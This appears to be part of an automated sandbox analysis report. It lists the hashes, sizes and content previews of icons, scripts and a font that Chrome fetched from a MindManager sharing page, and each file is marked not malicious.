                                                                SHA-256:66E33CA835BEC67BD12612E40363A606501A67D699282EA86A977FA60CB7804F
                                                                SHA-512:C96E4DA0AF72BF703BD6C849C3480B5011105EB03F9B5CF92F0F15138084A1178090917FBB6A855BFB20AC60DFF8927309C3245D2F0FAAA22EFAEA435B50FD12
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/mm-logo.svg
                                                                Preview:<svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M15.5488 14.144L10.5088 25.104L10.9088 25.28C11.5258 24.5303 12.3041 23.9294 13.1856 23.5222C14.0671 23.115 15.0291 22.9119 16 22.928C16.9682 22.9145 17.927 23.1189 18.8055 23.526C19.684 23.9331 20.4597 24.5326 21.0752 25.28V25.28L21.44 25.0592L16.4224 14.144H15.5488Z" fill="#84DDDA"/>.<path d="M25.8336 6.71974H20.16C20.0836 6.7197 20.0086 6.74054 19.9432 6.78002C19.8778 6.8195 19.8244 6.87611 19.7888 6.94374L16 14.1437L12.2272 6.94374C12.1916 6.87611 12.1382 6.8195 12.0728 6.78002C12.0074 6.74054 11.9324 6.7197 11.856 6.71974H6.16639C6.093 6.71931 6.02026 6.7334 5.95233 6.7612C5.88441 6.78899 5.82265 6.82994 5.77061 6.88168C5.71856 6.93343 5.67726 6.99495 5.64908 7.06272C5.6209 7.13048 5.60639 7.20315 5.60639 7.27654V24.7197C5.60597 24.7931 5.62006 24.8659 5.64786 24.9338C5.67565 25.0017 5.71659 25.0635 5.76834 25.1155C5.82009 25.1676 5.88161 25.2089 5.94937 25.237C6.01714 25.2652
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1470
                                                                Entropy (8bit):5.009122990762308
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5D44C49ECB6C8225E3D6B771637C299C
                                                                SHA1:7952C55A444D39C9A184563489E5A13BAC66B7A4
                                                                SHA-256:6764E76432B3A6220A8C5E6BC41752C125322AFAEEAC2C93DF255B9C039A264F
                                                                SHA-512:8DF2050FE6C732070CA63FC874532815A07660EDB023A39C157115F42F7AC5A8BB9881CB7F18A4933204A28C2E4FDB0FCDB979023FA9017CDBF9BE09D4741391
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_recent.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16.01"><defs><style>.cls-1{fill:#c8c7c8;}.cls-2{fill:gray;}.cls-3{fill:#fff;}.cls-4{fill:#4f87c6;}.cls-5{fill:none;stroke:#4f87c6;stroke-miterlimit:10;}</style></defs><title>context_recent</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M1.37,14.51a1,1,0,0,1-.87-1V1.4A.83.83,0,0,1,1.24.5H7C7.4.5,7.89,1,8.5,1.61v1.9h6.13a1,1,0,0,1,.87,1v8.93a1,1,0,0,1-.87,1Z"/><path class="cls-2" d="M7,1c.21,0,.65.42,1,.81V4h6.63c.18,0,.37.23.37.53v8.93c0,.31-.19.54-.37.54H1.37c-.18,0-.37-.23-.37-.54V1.4a.5.5,0,0,1,.11-.33A.19.19,0,0,1,1.25,1H7M7,0H1.24A1.33,1.33,0,0,0,0,1.4V13.47A1.46,1.46,0,0,0,1.37,15H14.63A1.46,1.46,0,0,0,16,13.47V4.54A1.46,1.46,0,0,0,14.63,3H9V1.4C8.24.63,7.65,0,7,0Z"/><rect class="cls-3" x="0.5" y="7.51" width="15" height="8" rx="1.71"/><path class="cls-2" d="M13.79,8A1.21,1.21,0,0,1,15,9.22V13.8A1.21,1.21,0,0,1,13.79,15H2.21A1.21,1.21,0,0,1,1,13.8V9.22A1.21,1.21,0,0,1,2
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1570
                                                                Entropy (8bit):4.471694293458928
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:40AADE2646FEA00C5BA90A74E7CF5777
                                                                SHA1:C4D3616CA42A3F2F50C68CB1968F17130A5BE1F7
                                                                SHA-256:32785E72AE6E95A1AEE806663762FE3D0191165D56318DE4330F9E882F871119
                                                                SHA-512:EEC180E36EC1881FBCBA2B74FF164C97D8E315155C30DEE66F2872EA19143C8F963088AF9864662F958E4703213B461C5045D1F5E9BB9F359858E29EAC9C51E1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priority06.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9a9aa3;}.cls-2{fill:#727272;}.cls-3{fill:#fff;}</style></defs><title>priority06</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M5,8.67a6.57,6.57,0,0,1,.32-2,6.46,6.46,0,0,1,.89-1.78A4.32,4.32,0,0,1,7.69,3.59a4.39,4.39,0,0,1,2.05-.48A5.09,5.09,0,0,1,12,3.54l-.66,2.1a2.78,2.78,0,0,0-.61-.19,3.31,3.31,0,0,0-.76-.1A2.14,2.14,0,0,0,7.76,7h0a2.28,2.28,0,0,1,.6-.24,3.24,3.24,0,0,1,.77-.11,3,3,0,0,1,2.68,1.42,3.73,3.73,0,0,1,.6,2,3.37,3.37,0,0,1-.93,2.36,3.23,3.23,0,0,1-2.49,1,3.82,3.82,0,0,1-2.85-1.24A4.86,4.86,0,0,1,5,8.67ZM9,10.93a.92.92,0,0,0,.73-.33A1.16,1.16,0,0,0,10,9.81a1.5,1.5,0,0,0-.38-1,1.41,1.41,0,0,0-1.13-.43c-.69,0-1,.2-1,.6A2.12,2.12,0,0,0,8,10.35,1.39,1.39,0,0,0,9,10.93Z"/><path class="cls-3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):7885
                                                                Entropy (8bit):4.074591447559181
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5DFA256F143C5BA37976696AC3C30091
                                                                SHA1:24740141AF180017F16F3C0571A343CD0896BE17
                                                                SHA-256:050757AEB69C572C92B20D104F42D04B58BFF7E5A7F92C59FD4B9E17D2454F58
                                                                SHA-512:EB4236E1F345258471C8ABA60771F53CE659030755D09C3F8B7D399F95DA79B2E8F6DB1D2A93F430014942B6B30F5918F8D8AE10C861027B4B17BD8314044B6B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/mm-23-snap-logo.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 179.05 25.29"><defs><style>.cls-1{fill:#000000;}.cls-2{fill:#13bb32;}.cls-3{fill:none;stroke:#13bb32;stroke-miterlimit:10;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M12.83,3.37V16.63H11.18V6.56L7,16.63H5.84L1.65,6.54V16.63H0V3.37H1.78L6.42,14.45,11.07,3.37Z"/><path class="cls-1" d="M15.68,4.91a1.08,1.08,0,0,1-.33-.8A1.11,1.11,0,0,1,16.47,3a1,1,0,0,1,.77.32,1.09,1.09,0,0,1,.32.8,1.07,1.07,0,0,1-.32.8,1,1,0,0,1-.77.33A1.06,1.06,0,0,1,15.68,4.91Zm1.59,1.94v9.94H15.62V6.85Z"/><path class="cls-1" d="M27.87,7.77A4.2,4.2,0,0,1,29,10.93v5.86H27.36V11.17a3.24,3.24,0,0,0-.74-2.28,2.7,2.7,0,0,0-2-.79,2.68,2.68,0,0,0-2.07.82,3.31,3.31,0,0,0-.77,2.38v5.49H20.08V6.85h1.66V8.27a3.24,3.24,0,0,1,1.33-1.18,4.1,4.1,0,0,1,1.86-.42A4,4,0,0,1,27.87,7.77Z"/><path class="cls-1" d="M31.69,9.11a4.58,4.58,0,0,1,1.7-1.79,4.72,4.72,0,0,1,2.42-.63A4.54,4.54,0,0,1,38,7.22,3.88,3.88,0,0,1,39.5,8.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2141)
                                                                Category:downloaded
                                                                Size (bytes):330719
                                                                Entropy (8bit):5.519310310327343
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FB5A66E3554575E3BAF5DEA30C34FDC3
                                                                SHA1:B1AD4EC6FF0F3217817E939C7FD3E6E9DE62DBC6
                                                                SHA-256:80C4C5396C9FA78DAC0DE804BE00ABB1A094C2C9380D4F08A0F6DA1181336A33
                                                                SHA-512:D109B8448EADD671B4BEB886A797B1EF4363C46979FD32B0A6C170A9A4B4BD5362422C56DF18FAD9FA6B7434CF27DF950670230435A1AC4D012C411F776E94CC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.IKZeRvoAYNY.O/m=client/rt=j/sv=1/d=1/ed=1/am=AAAQ/rs=AHpOoo-SMWTzMRJrTty6iE5dL_aWGYOnuw/cb=gapi.loaded_0?le=scs
                                                                Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x100000, ]);.var ba,ha,ia,na,oa,va,wa,Ba;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ha=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ia=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ia(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ha(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1377
                                                                Entropy (8bit):4.941776683335097
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A13E4E441E35377FD3505D0DC0A55193
                                                                SHA1:E1806A74D53002FD6AD331485CF2B54A629659E9
                                                                SHA-256:EC63F66BA32231E413A56A13B2C790BC6AB5DF496698108AB90CE62848681CCA
                                                                SHA-512:A64D424A3DB25805A44A172EA6E787D16664D459E75C56375F7113DAB2A1DD7726A60909EF190D332BCB8867C36E70F4C7EB56D703903F89C69EA108CE32965F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/RollUp/roll-up-cost.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15.24 16.86"><defs><style>.cls-1{fill:#efc46f;}.cls-2,.cls-3{fill:#b5863a;}.cls-2{stroke:#b5863a;stroke-miterlimit:10;stroke-width:0.18px;}.cls-4{fill:#629f59;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M8.12,12.33a4.5,4.5,0,0,1,4.5-4.5l.24,0C11.71,4.65,10,4.15,10,4.15L11.13.36h-8L4.32,4.15S.44,5.25.44,15c-.34.27,4.83.38,8.86.33A4.45,4.45,0,0,1,8.12,12.33Z"/><path class="cls-2" d="M6.81,12.23a2,2,0,0,1-2-1.83h.79a1.25,1.25,0,0,0,1.24,1.11V9.31l-.11,0C5.56,9,5,8.49,5,7.59H5A1.82,1.82,0,0,1,6.81,5.83V5.06h.55v.77a2,2,0,0,1,1.92,1.8h-.8A1.18,1.18,0,0,0,7.36,6.55V8.66l.14,0c1.18.28,1.84.77,1.84,1.73h0a1.9,1.9,0,0,1-2,1.81V13H6.81Zm0-3.7v-2c-.7.1-1.07.54-1.07,1h0C5.74,8,6,8.33,6.81,8.53Zm.55.91v2.08c.85-.07,1.18-.5,1.18-1h0c0-.5-.24-.83-1.15-1.05Z"/><path class="cls-3" d="M9,15A81.81,81.81,0,0,1,.8,14.8C.86,5.69,4.38,4.5,4.42,4.49l.35-.1L3.67.72h7L9.55,4.39l.35.1s1.51.53
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):557
                                                                Entropy (8bit):5.207472963145946
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5D2D69FDB06B0B6E13D9AF0951A137C2
                                                                SHA1:D8AA9DFC20F25839CF80A9A6AECF0784B72AB884
                                                                SHA-256:A48ADACAE06A9C46C1618F092CE7266A84D7C7DDB3E48C4CC49F969968B3A2B4
                                                                SHA-512:826F105A15EE99B99A36ECC083C7C22A0D4700F6409C64C87958E98AE695773861BBDA7FE4D9C5F323ED7E723753C71448C984C378149CF6BBF54A0331B32376
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDone09.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#2eb100;}.cls-2{fill:#378c37;}.cls-3{fill:#318231;}.cls-4{fill:#fff;}</style></defs><title>percentageDone09</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><polygon class="cls-3" points="6 7.67 4.22 9.44 7.78 13 14 6.78 12.22 5 7.78 9.44 6 7.67"/><polygon class="cls-4" points="5 6.67 3.22 8.44 6.78 12 13 5.78 11.22 4 6.78 8.44 5 6.67"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1614
                                                                Entropy (8bit):4.341903910829458
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:407132B9877B0570A3B3FE9CE3F350C4
                                                                SHA1:FA0118C60E44B2D4E3CB0861F9F5FE597AF555AE
                                                                SHA-256:6A59D756C99FA06E4F21FE99356A180CA141E9A6F162CE4572EC5B438F643F05
                                                                SHA-512:37855044321A86F77FF6E9C53517CAA1A86C8D2C6432CB3C72D69520E238BB189CD3120E1AB1F0E8856F5CB2C3B092A6E358B1E0CC76EB4340D6DB6277CBC6A1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/mm-logo-hover.svg
                                                                Preview:<svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M27 1H5C2.79086 1 1 2.79086 1 5V27C1 29.2091 2.79086 31 5 31H27C29.2091 31 31 29.2091 31 27V5C31 2.79086 29.2091 1 27 1ZM5 0C2.23858 0 0 2.23858 0 5V27C0 29.7614 2.23858 32 5 32H27C29.7614 32 32 29.7614 32 27V5C32 2.23858 29.7614 0 27 0H5Z" fill="#4EB0B3"/>.<path d="M15.5488 14.144L10.5088 25.104L10.9088 25.28C11.5258 24.5303 12.3041 23.9294 13.1856 23.5222C14.0671 23.115 15.0291 22.9119 16 22.928C16.9682 22.9145 17.927 23.1189 18.8055 23.526C19.684 23.9331 20.4597 24.5326 21.0752 25.28V25.28L21.44 25.0592L16.4224 14.144H15.5488Z" fill="#84DDDA"/>.<path d="M25.8336 6.71974H20.16C20.0836 6.7197 20.0086 6.74054 19.9432 6.78002C19.8778 6.8195 19.8244 6.87611 19.7888 6.94374L16 14.1437L12.2272 6.94374C12.1916 6.87611 12.1382 6.8195 12.0728 6.78002C12.0074 6.74054 11.9324 6.7197 11.856 6.71974H6.16639C6.093 6.71931 6.02026 6.7334 5.95233 6.7612C5.8
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                Category:downloaded
                                                                Size (bytes):28000
                                                                Entropy (8bit):7.99335735457429
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/rspQCAcri81s6ZVRghAH34yrLjQuwx40
                                                                Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1037
                                                                Entropy (8bit):5.05510107022874
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:90B0FE79F3E129A90D501E9219B0E06C
                                                                SHA1:167C1177A6501BD2E96FF73CC60B45DFC4B93E02
                                                                SHA-256:8E3E1E1B8B97BF7606ED24E2373BB7F3E45683BE689A3E95705CE6D7705090F1
                                                                SHA-512:C1CB85714346C4E3E59961F07FE6C3F995583FC9FD49D81522FA80EF8952B5D42D05927F5C1D041C481F0F1631F20FF4CDA079ACDF0612D3E3A09A7355983523
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_save.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:#c8c7c8;}</style></defs><title>context_save</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M1.33,15.5a.83.83,0,0,1-.83-.83V1.33A.83.83,0,0,1,1.33.5h9.73L15.5,4.94v9.73a.83.83,0,0,1-.83.83Z"/><path class="cls-2" d="M10.85,1,15,5.15v9.52a.33.33,0,0,1-.33.33H1.33A.33.33,0,0,1,1,14.67V1.33A.33.33,0,0,1,1.33,1h9.52m.41-1H1.33A1.34,1.34,0,0,0,0,1.33V14.67A1.34,1.34,0,0,0,1.33,16H14.67A1.34,1.34,0,0,0,16,14.67V4.74L11.26,0Z"/><rect class="cls-3" x="2.52" y="9.52" width="10.96" height="3.96" rx="0.52"/><path class="cls-2" d="M13,10h0V13H3V10H13m0-1H3a1,1,0,0,0-1,1V13a1,1,0,0,0,1,1H13a1,1,0,0,0,1-1V10a1,1,0,0,0-1-1Z"/><rect class="cls-2" x="4" y="11" width="8" height="1"/><path class="cls-2" d="M4,1h7a0,0,0,0,1,0,0V3.56A2.44,2.44,0,0,1,8.56,6H6.44A2.44,2.44,0,0,1,4,3.56V1A0,0,0,0,1,4,1Z"/><rect class="cls-3" x="8" y="2"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (39144)
                                                                Category:downloaded
                                                                Size (bytes):385942
                                                                Entropy (8bit):5.5478751560689545
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:88C72B6247D1316264E0FDA14E5FABC9
                                                                SHA1:47B43ACEDC323DD229E43D7FEED27F5C28683DED
                                                                SHA-256:7F8EA1F67A9C08D5630A7BC158828D2D7E30D894F61E2B3B2A2D2BB0971497F8
                                                                SHA-512:C8DBAFBCB2868941F58E426244C8F4C05E1505A861BF4C4D74F3942A55101C87CF8D840FE2B64EFD9FABE67B8AD215361D011DC12D3E3B1510C6982C7337CBD2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.googletagmanager.com/gtm.js?id=GTM-KGSQVXP
                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"10",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"webVitalsMeasurement.name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"webVitalsMeasurement.id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"webVitalsMeasurement.value"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"webVitalsMeasurement.deltaRounded"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",6
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):540
                                                                Entropy (8bit):5.222097857885631
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9943EF4351CE00A2C6EC5A531649C827
                                                                SHA1:A33F28407FB06BDF51B92DAAB491587A03E56998
                                                                SHA-256:80510408607004D85104A5CE3D9FFD0ED8B698B1E83F67928E6A62DEE2B1E1CD
                                                                SHA-512:2CC2EA85E76CD428D88FC37268F21723D85BF60B4D4A28F3915C88577154297C8693865D93B8F7C67EA647FAE122C37C593DCB105CF8AA614E1C532E8C9647AE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDone04.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}</style></defs><title>percentageDone04</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8.5,8.27V.52a7.49,7.49,0,0,1,4.91,12.66Z"/><path class="cls-4" d="M9,1.07a7,7,0,0,1,4.39,11.39L9,8.06v-7M8,0V8.48l5.41,5.41A8,8,0,0,0,8,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):272
                                                                Entropy (8bit):6.475932064117161
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DAD518BCF909327A074E777A9FE0C1C4
                                                                SHA1:4C0DBE6668A685B403DCF8C77629F593C8D6DEF1
                                                                SHA-256:A024063A0C7BA25FFEDD8BB63CD4F372708802CE7A9727B222A7AF4627C2CB8A
                                                                SHA-512:65A328F75DC37ECE9D77164BFD6F69BE3DBB74CBCAB0E2A5025E448C9E2DEE4C5C42ECD924E252D33E741353C8408628562756DAE6186DBFCD68960AA53FEE78
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-align-center-selected.png
                                                                Preview:.PNG........IHDR...0...0.....W.......pHYs.................tIME........8......IDATh..1.. .........~.b.#.-...WSd.....c#i..yP.....1!..W._@.....v...F.B..._...$9...............9.....UH.F.......Q....V.J......j....s.t.sV..<.Q.....$.O\.......72....2pWW........IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):565
                                                                Entropy (8bit):5.057632530034857
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DB52D82F501549497977CB5204770953
                                                                SHA1:17CD4A4A813D51DF2C4814B8EDE1D01F389D232D
                                                                SHA-256:D4F182ABF2A6030383D816E05998F7B92C9DE6D18E793B45978A0F271C25238D
                                                                SHA-512:DA0B45E79F213001B9A30D3E1D676DDED7BDD47DC4531EA03F1E8D75434A6375938D770E21B4FA3C1CB7C6E24CF3AF8409A1AFEE2C285DB526AE17963554C518
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_font_format.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 25 25"><defs><style>.cls-1{fill:#c9c9c9;stroke:gray;stroke-miterlimit:10;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M14.44,17.5H6.5s-2,3-1.4,5.59c.09.36,1.13.32,2.4.41v1H.5v-.64a3,3,0,0,0,1.86-1.05,14.18,14.18,0,0,0,1.8-3.55L11.69.5h1.07L21,19.78a11.72,11.72,0,0,0,1.93,3.45,2.6,2.6,0,0,0,1.61.63v.64h-11v-1H14a3.91,3.91,0,0,0,2-.38.9.9,0,0,0,.39-.79,1.84,1.84,0,0,0-.11-.64,12.94,12.94,0,0,0-.54-1.28Zm-1-1-3.34-8L6.69,16.5Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):914
                                                                Entropy (8bit):5.1102199564934505
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F71D238F7163C32BD5E2EF43A22087B5
                                                                SHA1:2E8DD301F52BE8E2B35D67269BB6B2952EB0D098
                                                                SHA-256:07F2853C032B45152FB73B417FD1ED41AF4763286DF42EA51DE3E66AF55D8E4B
                                                                SHA-512:527B2EC217A3046E0BFCD2DF19DB08FE3DD5D9A69B87D21550F602FBAF9741E24580C00324A14216ECE4C001A542754348846CE86C985A6AE77996ADE74A4F68
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/Dependencies/TaskAutomationStartToFinish.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 15.5"><defs><style>.cls-1{fill:#ecf4fa;}.cls-2,.cls-3,.cls-5{fill:none;stroke-miterlimit:10;}.cls-2{stroke:#009245;}.cls-3{stroke:#3283c0;}.cls-4{fill:#3283c0;}.cls-5{stroke:#a20400;}.cls-6{fill:#a20400;}</style></defs><title>dependency S2F</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" y="9" width="8" height="6"/><rect class="cls-2" x="0.5" y="8.5" width="8" height="6"/><polyline class="cls-2" points="2.5 11.5 3.5 12.5 6 10"/><rect class="cls-1" x="8" y="1" width="7" height="6"/><rect class="cls-3" x="8.5" y="0.5" width="7" height="6"/><line class="cls-3" x1="8" y1="3.5" x2="11.85" y2="3.5"/><polygon class="cls-4" points="11.41 5 14 3.5 11.41 2 11.41 5"/><line class="cls-5" x1="8.5" x2="8.5" y2="11.91"/><polygon class="cls-6" points="6.01 11.18 8.5 15.5 10.99 11.18 6.01 11.18"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):443
                                                                Entropy (8bit):5.073266495942236
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AFF994530686C05AF98EEF0D4D244FFC
                                                                SHA1:A9724AD0BC8B8BC7E5450B3DB84E7B6B99CC5EE3
                                                                SHA-256:A723E44C1E97A83B37AE43144B6BBD69A837726B74E12C0D19195342E23877E0
                                                                SHA-512:19FE20EA443D07C06E8C2274C674AB01E6652D8C1223F61F6E0C4C30A4B224C118E2084FAF1FABDFA56265361A63181069E2B2B93998BA75063DB129CB9AC4ED
                                                                Malicious:false
                                                                Reputation:unknown
